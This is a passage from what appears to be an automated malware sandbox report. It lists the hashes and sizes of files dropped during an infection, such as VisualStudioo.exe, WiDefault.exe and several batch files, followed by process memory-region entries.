                                          396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9

                                          SHA512

                                          22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

                                        • C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

                                          Filesize

                                          139KB

                                          MD5

                                          77878e1d8406d343fdbbfc359b33ff00

                                          SHA1

                                          7f6c6bae65298f8a112c97def45f66e6fb99ada8

                                          SHA256

                                          396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9

                                          SHA512

                                          22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

                                        • C:\Users\Admin\AppData\Roaming\WiDefault.exe

                                          Filesize

                                          86KB

                                          MD5

                                          394764dfa74ce250be386b93940a4439

                                          SHA1

                                          889ff161e9760d4fd66fcb18983ecba1082ae296

                                          SHA256

                                          8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a

                                          SHA512

                                          ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

                                        • C:\Users\Admin\AppData\Roaming\WiDefault.exe

                                          Filesize

                                          86KB

                                          MD5

                                          394764dfa74ce250be386b93940a4439

                                          SHA1

                                          889ff161e9760d4fd66fcb18983ecba1082ae296

                                          SHA256

                                          8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a

                                          SHA512

                                          ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

                                        • C:\Users\Admin\AppData\Roaming\WiDefault.exe

                                          Filesize

                                          86KB

                                          MD5

                                          394764dfa74ce250be386b93940a4439

                                          SHA1

                                          889ff161e9760d4fd66fcb18983ecba1082ae296

                                          SHA256

                                          8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a

                                          SHA512

                                          ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

                                        • C:\Users\Public\Music\RunNihaiersion.exe

                                          Filesize

                                          5KB

                                          MD5

                                          123bdf05b4b261644ff4579b8bd78806

                                          SHA1

                                          d6ce6069ba2faed71c5626daf8094a7ac921848b

                                          SHA256

                                          9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631

                                          SHA512

                                          e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

                                        • C:\Users\Public\Music\RunNihaiersion.exe

                                          Filesize

                                          5KB

                                          MD5

                                          123bdf05b4b261644ff4579b8bd78806

                                          SHA1

                                          d6ce6069ba2faed71c5626daf8094a7ac921848b

                                          SHA256

                                          9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631

                                          SHA512

                                          e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

                                        • C:\Users\Public\Music\RunihaiVersion.exe

                                          Filesize

                                          5KB

                                          MD5

                                          05b73b535c4337c16fc3f039c1b30dc1

                                          SHA1

                                          8de245727efd7aaa7fa1a3662430e823b68cec0a

                                          SHA256

                                          6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de

                                          SHA512

                                          6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

                                        • C:\Users\Public\Music\RunihaiVersion.exe

                                          Filesize

                                          5KB

                                          MD5

                                          05b73b535c4337c16fc3f039c1b30dc1

                                          SHA1

                                          8de245727efd7aaa7fa1a3662430e823b68cec0a

                                          SHA256

                                          6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de

                                          SHA512

                                          6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

                                        • C:\Users\Public\Music\bes.bat

                                          Filesize

                                          672B

                                          MD5

                                          9947ba16f06abcff429e922c49790337

                                          SHA1

                                          bd24d00f50e0d63892fc641a1438551d577b6e50

                                          SHA256

                                          8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f

                                          SHA512

                                          2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11

                                        • C:\Users\Public\Music\es.bat

                                          Filesize

                                          673B

                                          MD5

                                          b00ef4b757bc25a0f41c3d74961ff9a0

                                          SHA1

                                          cfdaca2c4c8f1fce33275361260b251d8d74173a

                                          SHA256

                                          417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76

                                          SHA512

                                          259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a

                                        • C:\Users\Public\Music\installer2.bat

                                          Filesize

                                          387B

                                          MD5

                                          50b98ed3895545b2b72b28966cfa2b0d

                                          SHA1

                                          bf98a58225c8ce199e48825624e793ee8e0ca3f8

                                          SHA256

                                          ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591

                                          SHA512

                                          af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa

                                        • C:\Users\Public\Music\israil.exe

                                          Filesize

                                          5KB

                                          MD5

                                          b65cd9956dfe1877c72ffe687fc632b4

                                          SHA1

                                          86c1bc804f2394bb0b20fa7434257786eb72e5bf

                                          SHA256

                                          561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0

                                          SHA512

                                          fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

                                        • C:\Users\Public\Music\israil.exe

                                          Filesize

                                          5KB

                                          MD5

                                          b65cd9956dfe1877c72ffe687fc632b4

                                          SHA1

                                          86c1bc804f2394bb0b20fa7434257786eb72e5bf

                                          SHA256

                                          561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0

                                          SHA512

                                          fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

                                        • C:\Users\Public\Music\israil2.exe

                                          Filesize

                                          5KB

                                          MD5

                                          e000e033786867fa9caa5d9d6728384a

                                          SHA1

                                          4313fddde6aba146cd3c3ddd42f2db36194ded10

                                          SHA256

                                          7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131

                                          SHA512

                                          3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

                                        • C:\Users\Public\Music\israil2.exe

                                          Filesize

                                          5KB

                                          MD5

                                          e000e033786867fa9caa5d9d6728384a

                                          SHA1

                                          4313fddde6aba146cd3c3ddd42f2db36194ded10

                                          SHA256

                                          7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131

                                          SHA512

                                          3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

                                        • C:\Users\Public\Music\uuac.bat

                                          Filesize

                                          108B

                                          MD5

                                          c0c5cf18ed5b12d0cf2e77312e553328

                                          SHA1

                                          9f594d79de6cd8d546a6b2869029ebbd59c4b93f

                                          SHA256

                                          197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69

                                          SHA512

                                          508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78

                                        • memory/448-515-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/448-145-0x0000000000370000-0x0000000000378000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/448-146-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/448-149-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/1496-6-0x00000000027B0000-0x00000000027E6000-memory.dmp

                                          Filesize

                                          216KB

                                        • memory/1496-25-0x0000000007430000-0x0000000007AAA000-memory.dmp

                                          Filesize

                                          6.5MB

                                        • memory/1496-9-0x0000000004DD0000-0x0000000004DF2000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/1496-7-0x00000000049F0000-0x0000000004A00000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1496-10-0x00000000056D0000-0x0000000005736000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1496-23-0x0000000005E60000-0x0000000005EAC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/1496-5-0x00000000049F0000-0x0000000004A00000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1496-8-0x0000000005030000-0x0000000005658000-memory.dmp

                                          Filesize

                                          6.2MB

                                        • memory/1496-26-0x00000000062A0000-0x00000000062BA000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/1496-4-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/1496-31-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/1496-11-0x0000000005740000-0x00000000057A6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1496-21-0x00000000058B0000-0x0000000005C04000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/1496-22-0x0000000005DB0000-0x0000000005DCE000-memory.dmp

                                          Filesize

                                          120KB

                                        • memory/1496-24-0x00000000049F0000-0x0000000004A00000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1952-119-0x0000000005300000-0x0000000005310000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1952-133-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/1952-118-0x0000000005300000-0x0000000005310000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1952-117-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/1952-130-0x0000000005300000-0x0000000005310000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2168-47-0x0000000005190000-0x00000000051A0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2168-50-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2168-35-0x0000000005190000-0x00000000051A0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2168-33-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2168-34-0x0000000005190000-0x00000000051A0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2168-41-0x0000000005FA0000-0x00000000062F4000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/2332-84-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2332-68-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2332-81-0x0000000005580000-0x0000000005590000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2332-70-0x0000000005580000-0x0000000005590000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2332-69-0x0000000005580000-0x0000000005590000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2512-100-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2512-86-0x0000000004F60000-0x0000000004F70000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2512-97-0x0000000004F60000-0x0000000004F70000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2512-85-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2784-27-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2784-1-0x0000000000980000-0x0000000000996000-memory.dmp

                                          Filesize

                                          88KB

                                        • memory/2784-0-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/2812-442-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/3312-539-0x0000000000400000-0x0000000000420000-memory.dmp

                                          Filesize

                                          128KB

                                        • memory/3532-116-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/3532-101-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/3532-113-0x0000000002760000-0x0000000002770000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3532-102-0x0000000002760000-0x0000000002770000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4000-177-0x0000000007170000-0x000000000717A000-memory.dmp

                                          Filesize

                                          40KB

                                        • memory/4000-150-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4000-151-0x0000000004990000-0x00000000049A0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4000-163-0x0000000004990000-0x00000000049A0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4000-164-0x0000000006370000-0x00000000063A2000-memory.dmp

                                          Filesize

                                          200KB

                                        • memory/4000-157-0x0000000005750000-0x0000000005AA4000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/4000-165-0x00000000703C0000-0x000000007040C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4000-175-0x0000000006340000-0x000000000635E000-memory.dmp

                                          Filesize

                                          120KB

                                        • memory/4000-176-0x0000000006E30000-0x0000000006ED3000-memory.dmp

                                          Filesize

                                          652KB

                                        • memory/4000-178-0x0000000007360000-0x00000000073F6000-memory.dmp

                                          Filesize

                                          600KB

                                        • memory/4104-179-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4436-67-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4436-52-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4436-51-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4436-53-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4436-64-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4632-141-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4632-138-0x0000000074D30000-0x00000000754E0000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4632-137-0x0000000000E20000-0x0000000000E28000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4712-567-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-589-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-563-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-565-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-559-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-569-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-571-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-573-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-575-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-577-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-579-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-581-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-583-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-585-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-587-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-561-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-591-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-595-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-607-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-610-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-612-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-614-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-616-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-618-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-620-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-622-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-624-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-626-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-628-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-630-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB

                                        • memory/4712-558-0x0000000006B40000-0x0000000006BD8000-memory.dmp

                                          Filesize

                                          608KB